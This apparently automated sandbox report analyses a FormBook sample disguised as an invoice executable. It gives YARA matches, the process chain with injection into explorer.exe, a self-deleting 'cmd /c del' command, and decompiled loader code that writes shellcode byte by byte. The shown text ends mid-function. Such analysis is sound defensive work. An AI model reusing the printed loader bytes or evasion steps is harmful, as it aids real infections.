Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.234295512.0000000003970000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.234295512.0000000003970000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.234295512.0000000003970000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: INVOICE_90990_PDF.exe PID: 6040 Parent PID: 5748

General

Start time:	13:08:34
Start date:	09/08/2021
Path:	C:\Users\user\Desktop\INVOICE_90990_PDF.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\INVOICE_90990_PDF.exe'
Imagebase:	0x400000
File size:	304901 bytes
MD5 hash:	3E94BEE073A286E8B446E87A126DDE1E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.231116908.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.231116908.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.231116908.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.312959216.0000000000590000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.312959216.0000000000590000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.312959216.0000000000590000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.313017182.00000000005C0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.313017182.00000000005C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.313017182.00000000005C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3472 Parent PID: 6040

General

Start time:	13:08:38
Start date:	09/08/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff693d90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.278227524.0000000006D3C000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.278227524.0000000006D3C000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.278227524.0000000006D3C000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: autoconv.exe PID: 3900 Parent PID: 3472

General

Start time:	13:09:07
Start date:	09/08/2021
Path:	C:\Windows\SysWOW64\autoconv.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SysWOW64\autoconv.exe
Imagebase:	0xf10000
File size:	851968 bytes
MD5 hash:	4506BE56787EDCD771A351C10B5AE3B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: chkdsk.exe PID: 5412 Parent PID: 6040

General

Start time:	13:09:13
Start date:	09/08/2021
Path:	C:\Windows\SysWOW64\chkdsk.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\chkdsk.exe
Imagebase:	0x2b0000
File size:	23040 bytes
MD5 hash:	2D5A2497CB57C374B3AE3080FF9186FB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.490998807.0000000000430000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.490998807.0000000000430000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.490998807.0000000000430000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 5924 Parent PID: 5412

General

Start time:	13:09:15
Start date:	09/08/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\INVOICE_90990_PDF.exe'
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5380 Parent PID: 5924

General

Start time:	13:09:16
Start date:	09/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6915b0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: INVOICE_90990_PDF.exe PID: 5748 Parent PID: 5692 INVOICE_90990_PDF.exeCOMMON

Executed Functions

Function 021F06DA, Relevance: 10.7, APIs: 7, Instructions: 196filememoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 021F07B4
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 021F07DE
ReadFile.KERNELBASE(00000000,00000000,021F026C,?,00000000), ref: 021F07F5
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 021F0817
FindCloseChangeNotification.KERNELBASE(7FDFFF66,?,?,?,?,?,?,?,?,?,?,?,?,?,021F01AE,7FDFFF66), ref: 021F088A
VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 021F0895
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,021F01AE), ref: 021F08E0

Memory Dump Source

Source File: 00000000.00000002.234279906.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
String ID:
API String ID: 656311269-0
Opcode ID: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
Instruction ID: fa026aa76c971e5b05c7773f26f4cf3c70af6c0ee620cd547e4a139eeecca4e9
Opcode Fuzzy Hash: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
Instruction Fuzzy Hash: 5861A174E40708ABCB50DFA4C880BAEB7B6AF4C710F148069E625EB396E7349D41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00403019, Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403019() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00403025); // executed
				return _t1;
			}

0x0040301e
0x00403024

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00003025,00402989), ref: 0040301E

Memory Dump Source

Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 07ca0ebe614cf4b4898eab6ac77fa8a71f1dcbcb66f23ab2edaa1f53d3837756
Instruction ID: 078e50a1ba230bc3ff970d1ec26e00b271efa9b8dbf7e9ea61bee460832fafba
Opcode Fuzzy Hash: 07ca0ebe614cf4b4898eab6ac77fa8a71f1dcbcb66f23ab2edaa1f53d3837756
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00401630, Relevance: 380.6, APIs: 10, Strings: 207, Instructions: 818
memoryCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00401630() {
				signed int _v8;
				void* _v12;
				PWCHAR* _v16;
				WCHAR* _v20;
				void* _v24;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				char _v57;
				char _v58;
				char _v59;
				char _v60;
				char _v61;
				char _v62;
				char _v63;
				char _v64;
				char _v65;
				char _v66;
				char _v67;
				char _v68;
				char _v69;
				char _v70;
				char _v71;
				char _v72;
				char _v73;
				char _v74;
				char _v75;
				char _v76;
				char _v77;
				char _v78;
				char _v79;
				char _v80;
				char _v81;
				char _v82;
				char _v83;
				char _v84;
				char _v85;
				char _v86;
				char _v87;
				char _v88;
				char _v89;
				char _v90;
				char _v91;
				char _v92;
				char _v93;
				char _v94;
				char _v95;
				char _v96;
				char _v97;
				char _v98;
				char _v99;
				char _v100;
				char _v101;
				char _v102;
				char _v103;
				char _v104;
				char _v105;
				char _v106;
				char _v107;
				char _v108;
				char _v109;
				char _v110;
				char _v111;
				char _v112;
				char _v113;
				char _v114;
				char _v115;
				char _v116;
				char _v117;
				char _v118;
				char _v119;
				char _v120;
				char _v121;
				char _v122;
				char _v123;
				char _v124;
				char _v125;
				char _v126;
				char _v127;
				char _v128;
				char _v129;
				char _v130;
				char _v131;
				char _v132;
				char _v133;
				char _v134;
				char _v135;
				char _v136;
				char _v137;
				char _v138;
				char _v139;
				char _v140;
				char _v141;
				char _v142;
				char _v143;
				char _v144;
				char _v145;
				char _v146;
				char _v147;
				char _v148;
				char _v149;
				char _v150;
				char _v151;
				char _v152;
				char _v153;
				char _v154;
				char _v155;
				char _v156;
				char _v157;
				char _v158;
				char _v159;
				char _v160;
				char _v161;
				char _v162;
				char _v163;
				char _v164;
				char _v165;
				char _v166;
				char _v167;
				char _v168;
				char _v169;
				char _v170;
				char _v171;
				char _v172;
				char _v173;
				char _v174;
				char _v175;
				char _v176;
				char _v177;
				char _v178;
				char _v179;
				char _v180;
				char _v181;
				char _v182;
				char _v183;
				char _v184;
				char _v185;
				char _v186;
				char _v187;
				char _v188;
				char _v189;
				char _v190;
				char _v191;
				char _v192;
				char _v193;
				char _v194;
				char _v195;
				char _v196;
				char _v197;
				char _v198;
				char _v199;
				char _v200;
				char _v201;
				char _v202;
				char _v203;
				char _v204;
				char _v205;
				char _v206;
				char _v207;
				char _v208;
				char _v209;
				char _v210;
				char _v211;
				char _v212;
				char _v213;
				char _v214;
				char _v215;
				char _v216;
				char _v217;
				char _v218;
				char _v219;
				char _v220;
				char _v221;
				char _v222;
				char _v223;
				char _v224;
				char _v225;
				char _v226;
				char _v227;
				char _v228;
				char _v229;
				char _v230;
				char _v231;
				char _v232;
				char _v233;
				char _v234;
				char _v235;
				char _v236;
				char _v237;
				char _v238;
				char _v239;
				char _v240;
				char _v241;
				char _v242;
				char _v243;
				char _v244;
				char _v245;
				char _v246;
				char _v247;
				char _v248;
				char _v249;
				char _v250;
				char _v251;
				char _v252;
				char _v253;
				char _v254;
				char _v255;
				char _v256;
				char _v257;
				char _v258;
				char _v259;
				char _v260;
				char _v261;
				char _v262;
				char _v263;
				char _v264;
				char _v265;
				char _v266;
				char _v267;
				char _v268;
				char _v269;
				char _v270;
				char _v271;
				char _v272;
				char _v273;
				char _v274;
				char _v275;
				char _v276;
				char _v277;
				char _v278;
				char _v279;
				char _v280;
				char _v281;
				char _v282;
				char _v283;
				char _v284;
				char _v285;
				char _v286;
				char _v287;
				char _v288;
				char _v289;
				char _v290;
				char _v291;
				char _v292;
				char _v293;
				char _v294;
				char _v295;
				char _v296;
				char _v297;
				char _v298;
				char _v299;
				char _v300;
				char _v301;
				char _v302;
				char _v303;
				char _v304;
				char _v305;
				char _v306;
				char _v307;
				char _v308;
				char _v309;
				char _v310;
				char _v311;
				char _v312;
				char _v313;
				char _v314;
				char _v315;
				char _v316;
				char _v317;
				char _v318;
				char _v319;
				char _v320;
				char _v321;
				char _v322;
				char _v323;
				char _v324;
				char _v325;
				char _v326;
				char _v327;
				char _v328;
				char _v329;
				char _v330;
				char _v331;
				char _v332;
				char _v333;
				char _v334;
				char _v335;
				char _v336;
				char _v337;
				char _v338;
				char _v339;
				char _v340;
				char _v341;
				char _v342;
				char _v343;
				char _v344;
				char _v345;
				char _v346;
				char _v347;
				char _v348;
				char _v349;
				char _v350;
				char _v351;
				char _v352;
				char _v353;
				char _v354;
				char _v355;
				char _v356;
				char _v357;
				char _v358;
				char _v359;
				char _v360;
				char _v361;
				char _v362;
				char _v363;
				char _v364;
				char _v365;
				char _v366;
				char _v367;
				char _v368;
				char _v369;
				char _v370;
				char _v371;
				char _v372;
				char _v373;
				char _v374;
				char _v375;
				char _v376;
				char _v377;
				char _v378;
				char _v379;
				char _v380;
				char _v381;
				char _v382;
				char _v383;
				char _v384;
				char _v385;
				char _v386;
				char _v387;
				char _v388;
				char _v389;
				char _v390;
				char _v391;
				char _v392;
				char _v393;
				char _v394;
				char _v395;
				char _v396;
				char _v397;
				char _v398;
				char _v399;
				char _v400;
				char _v401;
				char _v402;
				char _v403;
				char _v404;
				char _v405;
				char _v406;
				char _v407;
				char _v408;
				char _v409;
				char _v410;
				char _v411;
				char _v412;
				char _v413;
				char _v414;
				char _v415;
				char _v416;
				char _v417;
				char _v418;
				char _v419;
				char _v420;
				char _v421;
				char _v422;
				char _v423;
				char _v424;
				char _v425;
				char _v426;
				char _v427;
				char _v428;
				char _v429;
				char _v430;
				char _v431;
				char _v432;
				char _v433;
				char _v434;
				char _v435;
				char _v436;
				char _v437;
				char _v438;
				char _v439;
				char _v440;
				char _v441;
				char _v442;
				char _v443;
				char _v444;
				char _v445;
				char _v446;
				char _v447;
				char _v448;
				char _v449;
				char _v450;
				char _v451;
				char _v452;
				char _v453;
				char _v454;
				char _v455;
				char _v456;
				char _v457;
				char _v458;
				char _v459;
				char _v460;
				char _v461;
				char _v462;
				char _v463;
				char _v464;
				char _v465;
				char _v466;
				char _v467;
				char _v468;
				char _v469;
				char _v470;
				char _v471;
				char _v472;
				char _v473;
				char _v474;
				char _v475;
				char _v476;
				char _v477;
				char _v478;
				char _v479;
				char _v480;
				char _v481;
				char _v482;
				char _v483;
				char _v484;
				char _v485;
				char _v486;
				char _v487;
				char _v488;
				char _v489;
				char _v490;
				char _v491;
				char _v492;
				char _v493;
				char _v494;
				char _v495;
				char _v496;
				char _v497;
				char _v498;
				char _v499;
				char _v500;
				char _v501;
				char _v502;
				char _v503;
				char _v504;
				char _v505;
				char _v506;
				char _v507;
				char _v508;
				char _v509;
				char _v510;
				char _v511;
				char _v512;
				char _v513;
				char _v514;
				char _v515;
				char _v516;
				char _v517;
				char _v518;
				char _v519;
				char _v520;
				char _v521;
				char _v522;
				char _v523;
				char _v524;
				char _v525;
				char _v526;
				char _v527;
				char _v528;
				char _v529;
				char _v530;
				char _v531;
				char _v532;
				char _v533;
				char _v534;
				char _v535;
				char _v536;
				char _v537;
				char _v538;
				char _v539;
				char _v540;
				char _v541;
				char _v542;
				char _v543;
				char _v544;
				char _v545;
				char _v546;
				char _v547;
				char _v548;
				char _v549;
				char _v550;
				char _v551;
				char _v552;
				char _v553;
				char _v554;
				char _v555;
				char _v556;
				char _v557;
				char _v558;
				char _v559;
				char _v560;
				char _v561;
				char _v562;
				char _v563;
				char _v564;
				char _v565;
				char _v566;
				char _v567;
				char _v568;
				char _v569;
				char _v570;
				char _v571;
				char _v572;
				char _v573;
				char _v574;
				char _v575;
				char _v576;
				char _v577;
				char _v578;
				char _v579;
				char _v580;
				char _v581;
				char _v582;
				char _v583;
				char _v584;
				char _v585;
				char _v586;
				char _v587;
				char _v588;
				char _v589;
				char _v590;
				char _v591;
				char _v592;
				char _v593;
				char _v594;
				char _v595;
				char _v596;
				char _v597;
				char _v598;
				char _v599;
				char _v600;
				char _v601;
				char _v602;
				char _v603;
				char _v604;
				char _v605;
				char _v606;
				char _v607;
				char _v608;
				char _v609;
				char _v610;
				char _v611;
				char _v612;
				char _v613;
				char _v614;
				char _v615;
				char _v616;
				char _v617;
				char _v618;
				char _v619;
				char _v620;
				char _v621;
				char _v622;
				char _v623;
				char _v624;
				char _v625;
				char _v626;
				char _v627;
				char _v628;
				char _v629;
				char _v630;
				char _v631;
				char _v632;
				char _v633;
				char _v634;
				char _v635;
				char _v636;
				char _v637;
				char _v638;
				char _v639;
				char _v640;
				char _v641;
				char _v642;
				char _v643;
				char _v644;
				char _v645;
				char _v646;
				char _v647;
				char _v648;
				char _v649;
				char _v650;
				char _v651;
				char _v652;
				char _v653;
				char _v654;
				char _v655;
				char _v656;
				char _v657;
				char _v658;
				char _v659;
				char _v660;
				char _v661;
				char _v662;
				char _v663;
				char _v664;
				char _v665;
				char _v666;
				char _v667;
				char _v668;
				char _v669;
				char _v670;
				char _v671;
				char _v672;
				char _v673;
				char _v674;
				char _v675;
				_Unknown_base(*)() _v676;
				long _v680;
				intOrPtr _v684;
				int _v688;
				WCHAR* _v692;
				long _v696;
				char _v712;
				void* _v1712;
				intOrPtr* _t739;
				void* _t745;
				intOrPtr _t775;
				void* _t784;

				_v676 = 0xe9;
				_v675 = 0x90;
				_v674 = 0;
				_v673 = 0;
				_v672 = 0;
				_v671 = 0x55;
				_v670 = 0x8b;
				_v669 = 0xec;
				_v668 = 0x56;
				_v667 = 0x8b;
				_v666 = 0x75;
				_v665 = 8;
				_v664 = 0xba;
				_v663 = 0x37;
				_v662 = 7;
				_v661 = 0;
				_v660 = 0;
				_v659 = 0x57;
				_v658 = 0xeb;
				_v657 = 0xe;
				_v656 = 0x8b;
				_v655 = 0xca;
				_v654 = 0xd1;
				_v653 = 0xe8;
				_v652 = 0xc1;
				_v651 = 0xe1;
				_v650 = 7;
				_v649 = 0x46;
				_v648 = 0xb;
				_v647 = 0xc8;
				_v646 = 3;
				_v645 = 0xcf;
				_v644 = 3;
				_v643 = 0xd1;
				_v642 = 0xf;
				_v641 = 0xbe;
				_v640 = 0x3e;
				_v639 = 0x8b;
				_v638 = 0xc2;
				_v637 = 0x85;
				_v636 = 0xff;
				_v635 = 0x75;
				_v634 = 0xe9;
				_v633 = 0x5f;
				_v632 = 0x5e;
				_v631 = 0x5d;
				_v630 = 0xc3;
				_v629 = 0x55;
				_v628 = 0x8b;
				_v627 = 0xec;
				_v626 = 0x51;
				_v625 = 0x51;
				_v624 = 0x53;
				_v623 = 0x56;
				_v622 = 0x57;
				_v621 = 0x8b;
				_v620 = 0x7d;
				_v619 = 8;
				_v618 = 0x33;
				_v617 = 0xf6;
				_v616 = 0x8b;
				_v615 = 0x47;
				_v614 = 0x3c;
				_v613 = 0x8b;
				_v612 = 0x44;
				_v611 = 0x38;
				_v610 = 0x78;
				_v609 = 3;
				_v608 = 0xc7;
				_v607 = 0x8b;
				_v606 = 0x50;
				_v605 = 0x20;
				_v604 = 0x8b;
				_v603 = 0x58;
				_v602 = 0x1c;
				_v601 = 3;
				_v600 = 0xd7;
				_v599 = 0x8b;
				_v598 = 0x48;
				_v597 = 0x24;
				_v596 = 3;
				_v595 = 0xdf;
				_v594 = 0x8b;
				_v593 = 0x40;
				_v592 = 0x18;
				_v591 = 3;
				_v590 = 0xcf;
				_v589 = 0x89;
				_v588 = 0x55;
				_v587 = 0xfc;
				_v586 = 0x89;
				_v585 = 0x4d;
				_v584 = 0xf8;
				_v583 = 0x89;
				_v582 = 0x45;
				_v581 = 8;
				_v580 = 0x85;
				_v579 = 0xc0;
				_v578 = 0x74;
				_v577 = 0x1a;
				_v576 = 0x8b;
				_v575 = 4;
				_v574 = 0xb2;
				_v573 = 3;
				_v572 = 0xc7;
				_v571 = 0x50;
				_v570 = 0xe8;
				_v569 = 0x96;
				_v568 = 0xff;
				_v567 = 0xff;
				_v566 = 0xff;
				_v565 = 0x59;
				_v564 = 0x3b;
				_v563 = 0x45;
				_v562 = 0xc;
				_v561 = 0x74;
				_v560 = 0x12;
				_v559 = 0x8b;
				_v558 = 0x55;
				_v557 = 0xfc;
				_v556 = 0x46;
				_v555 = 0x3b;
				_v554 = 0x75;
				_v553 = 8;
				_v552 = 0x72;
				_v551 = 0xe6;
				_v550 = 0x33;
				_v549 = 0xc0;
				_v548 = 0x5f;
				_v547 = 0x5e;
				_v546 = 0x5b;
				_v545 = 0x8b;
				_v544 = 0xe5;
				_v543 = 0x5d;
				_v542 = 0xc3;
				_v541 = 0x8b;
				_v540 = 0x45;
				_v539 = 0xf8;
				_v538 = 0xf;
				_v537 = 0xb7;
				_v536 = 4;
				_v535 = 0x70;
				_v534 = 0x8b;
				_v533 = 4;
				_v532 = 0x83;
				_v531 = 3;
				_v530 = 0xc7;
				_v529 = 0xeb;
				_v528 = 0xeb;
				_v527 = 0x55;
				_v526 = 0x8b;
				_v525 = 0xec;
				_v524 = 0x81;
				_v523 = 0xec;
				_v522 = 0x24;
				_v521 = 4;
				_v520 = 0;
				_v519 = 0;
				_v518 = 0x53;
				_v517 = 0x56;
				_v516 = 0x57;
				_v515 = 0x64;
				_v514 = 0xa1;
				_v513 = 0x30;
				_v512 = 0;
				_v511 = 0;
				_v510 = 0;
				_v509 = 0x8b;
				_v508 = 0x40;
				_v507 = 0xc;
				_v506 = 0x8b;
				_v505 = 0x40;
				_v504 = 0xc;
				_v503 = 0x8b;
				_v502 = 0;
				_v501 = 0x8b;
				_v500 = 0;
				_v499 = 0x8b;
				_v498 = 0x40;
				_v497 = 0x18;
				_v496 = 0x8b;
				_v495 = 0xf0;
				_v494 = 0x33;
				_v493 = 0xdb;
				_v492 = 0x68;
				_v491 = 0xe5;
				_v490 = 0xf0;
				_v489 = 0x6b;
				_v488 = 0xf9;
				_v487 = 0x56;
				_v486 = 0x89;
				_v485 = 0x5d;
				_v484 = 0xec;
				_v483 = 0xe8;
				_v482 = 0x69;
				_v481 = 0xff;
				_v480 = 0xff;
				_v479 = 0xff;
				_v478 = 0x68;
				_v477 = 0xba;
				_v476 = 0x23;
				_v475 = 0xa4;
				_v474 = 0x72;
				_v473 = 0x56;
				_v472 = 0x8b;
				_v471 = 0xf8;
				_v470 = 0xe8;
				_v469 = 0x5c;
				_v468 = 0xff;
				_v467 = 0xff;
				_v466 = 0xff;
				_v465 = 0x68;
				_v464 = 0xe9;
				_v463 = 0xfe;
				_v462 = 0xab;
				_v461 = 0x57;
				_v460 = 0x56;
				_v459 = 0x89;
				_v458 = 0x45;
				_v457 = 0xf8;
				_v456 = 0xe8;
				_v455 = 0x4e;
				_v454 = 0xff;
				_v453 = 0xff;
				_v452 = 0xff;
				_v451 = 0x68;
				_v450 = 0xe5;
				_v449 = 0xf9;
				_v448 = 0x2d;
				_v447 = 0xff;
				_v446 = 0x56;
				_v445 = 0x89;
				_v444 = 0x45;
				_v443 = 0xfc;
				_v442 = 0xe8;
				_v441 = 0x40;
				_v440 = 0xff;
				_v439 = 0xff;
				_v438 = 0xff;
				_v437 = 0x68;
				_v436 = 0x30;
				_v435 = 0x8d;
				_v434 = 0x79;
				_v433 = 0x61;
				_v432 = 0x56;
				_v431 = 0x89;
				_v430 = 0x45;
				_v429 = 0xf4;
				_v428 = 0xe8;
				_v427 = 0x32;
				_v426 = 0xff;
				_v425 = 0xff;
				_v424 = 0xff;
				_v423 = 0x83;
				_v422 = 0xc4;
				_v421 = 0x28;
				_v420 = 0x89;
				_v419 = 0x45;
				_v418 = 0xf0;
				_v417 = 0x8d;
				_v416 = 0x85;
				_v415 = 0xdc;
				_v414 = 0xfb;
				_v413 = 0xff;
				_v412 = 0xff;
				_v411 = 0x68;
				_v410 = 3;
				_v409 = 1;
				_v408 = 0;
				_v407 = 0;
				_v406 = 0x50;
				_v405 = 0x53;
				_v404 = 0xff;
				_v403 = 0xd7;
				_v402 = 0x85;
				_v401 = 0xc0;
				_v400 = 0xf;
				_v399 = 0x84;
				_v398 = 0x44;
				_v397 = 1;
				_v396 = 0;
				_v395 = 0;
				_v394 = 0x53;
				_v393 = 0x68;
				_v392 = 0x80;
				_v391 = 0;
				_v390 = 0;
				_v389 = 0;
				_v388 = 0x6a;
				_v387 = 3;
				_v386 = 0x53;
				_v385 = 0x6a;
				_v384 = 7;
				_v383 = 0x68;
				_v382 = 0;
				_v381 = 0;
				_v380 = 0;
				_v379 = 0x80;
				_v378 = 0x8d;
				_v377 = 0x85;
				_v376 = 0xdc;
				_v375 = 0xfb;
				_v374 = 0xff;
				_v373 = 0xff;
				_v372 = 0x50;
				_v371 = 0xff;
				_v370 = 0x55;
				_v369 = 0xfc;
				_v368 = 0x89;
				_v367 = 0x45;
				_v366 = 0xfc;
				_v365 = 0x83;
				_v364 = 0xf8;
				_v363 = 0xff;
				_v362 = 0xf;
				_v361 = 0x84;
				_v360 = 0x1e;
				_v359 = 1;
				_v358 = 0;
				_v357 = 0;
				_v356 = 0x53;
				_v355 = 0x50;
				_v354 = 0xff;
				_v353 = 0x55;
				_v352 = 0xf4;
				_v351 = 0x8b;
				_v350 = 0xf8;
				_v349 = 0x83;
				_v348 = 0xff;
				_v347 = 0xff;
				_v346 = 0xf;
				_v345 = 0x84;
				_v344 = 0xe;
				_v343 = 1;
				_v342 = 0;
				_v341 = 0;
				_v340 = 0x6a;
				_v339 = 4;
				_v338 = 0x68;
				_v337 = 0;
				_v336 = 0x30;
				_v335 = 0;
				_v334 = 0;
				_v333 = 0x57;
				_v332 = 0x53;
				_v331 = 0xff;
				_v330 = 0x55;
				_v329 = 0xf8;
				_v328 = 0x8b;
				_v327 = 0xf0;
				_v326 = 0x85;
				_v325 = 0xf6;
				_v324 = 0xf;
				_v323 = 0x84;
				_v322 = 0xf8;
				_v321 = 0;
				_v320 = 0;
				_v319 = 0;
				_v318 = 0x53;
				_v317 = 0x8d;
				_v316 = 0x45;
				_v315 = 0xec;
				_v314 = 0x50;
				_v313 = 0x57;
				_v312 = 0x56;
				_v311 = 0xff;
				_v310 = 0x75;
				_v309 = 0xfc;
				_v308 = 0xff;
				_v307 = 0x55;
				_v306 = 0xf0;
				_v305 = 0x85;
				_v304 = 0xc0;
				_v303 = 0xf;
				_v302 = 0x84;
				_v301 = 0xe3;
				_v300 = 0;
				_v299 = 0;
				_v298 = 0;
				_v297 = 0x8b;
				_v296 = 0x46;
				_v295 = 0x3c;
				_v294 = 3;
				_v293 = 0xc6;
				_v292 = 0xf;
				_v291 = 0xb7;
				_v290 = 0x48;
				_v289 = 6;
				_v288 = 0x8b;
				_v287 = 0x50;
				_v286 = 0x54;
				_v285 = 0x89;
				_v284 = 0x55;
				_v283 = 0xfc;
				_v282 = 0x85;
				_v281 = 0xc9;
				_v280 = 0x74;
				_v279 = 0x19;
				_v278 = 0xf;
				_v277 = 0xb7;
				_v276 = 0x50;
				_v275 = 0x14;
				_v274 = 0x83;
				_v273 = 0xc2;
				_v272 = 0x28;
				_v271 = 3;
				_v270 = 0xc2;
				_v269 = 0x8b;
				_v268 = 0x55;
				_v267 = 0xfc;
				_v266 = 3;
				_v265 = 0x10;
				_v264 = 0x8d;
				_v263 = 0x40;
				_v262 = 0x28;
				_v261 = 0x83;
				_v260 = 0xe9;
				_v259 = 1;
				_v258 = 0x75;
				_v257 = 0xf6;
				_v256 = 0x89;
				_v255 = 0x55;
				_v254 = 0xfc;
				_v253 = 0x6a;
				_v252 = 0x40;
				_v251 = 0xb8;
				_v250 = 0x7e;
				_v249 = 0x13;
				_v248 = 0;
				_v247 = 0;
				_v246 = 0x2b;
				_v245 = 0xfa;
